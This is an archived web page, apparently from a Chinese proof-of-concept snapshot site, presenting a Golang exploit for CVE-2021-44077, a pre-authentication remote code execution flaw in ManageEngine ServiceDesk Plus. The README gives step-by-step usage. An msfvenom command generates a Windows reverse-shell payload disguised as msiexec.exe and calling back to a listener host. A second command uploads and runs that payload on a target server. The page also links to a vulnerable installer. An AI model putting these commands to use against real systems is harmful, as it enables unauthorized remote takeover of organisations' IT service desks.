Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-44077 PoC — ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞

Source
Associated Vulnerability
Title:ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞 (CVE-2021-44077)
Description:ZOHO ManageEngine ServiceDesk Plus(SDP)是美国卓豪(ZOHO)公司的一套基于ITIL架构的IT服务管理软件。该软件集成了事件管理、问题管理、资产管理IT项目管理、采购与合同管理等功能模块。 ZOHO ManageEngine ServiceDesk Plus 存在访问控制错误漏洞,未经身份验证的攻击者可以远程执行代码。以下产品及版本受到影响:Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plu
Description
Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306
Readme
# Golang-CVE-2021-44077-POC

This exploit is an unauthenticated RCE in Zoho ManageEngine ServiceDesk Plus < 11306. 

You can find a vulnerable version of the software here: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

I couldn't find a Golang version of this, so here it is. My code isn't great, so proceed at your own risk. 

Blog post: 

https://www.pizzapower.me/2022/09/29/golang-proof-of-concept-exploit-for-cve-2021-44077-preauth-rce-in-manageengine-servicedesk-plus-11306/

## Running

Create a malicious payload in your current directory. 

```msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe```

Then, run the exploit.

```go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"```

-u is the vulnerable URL
-f is your malicious file 

 

File Snapshot

[4.0K] /data/pocs/3933882d8b90ef886d9bdd7d8c86bae2da71edd5 ├── [3.2K] CVE-2021-44077.go └── [ 856] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.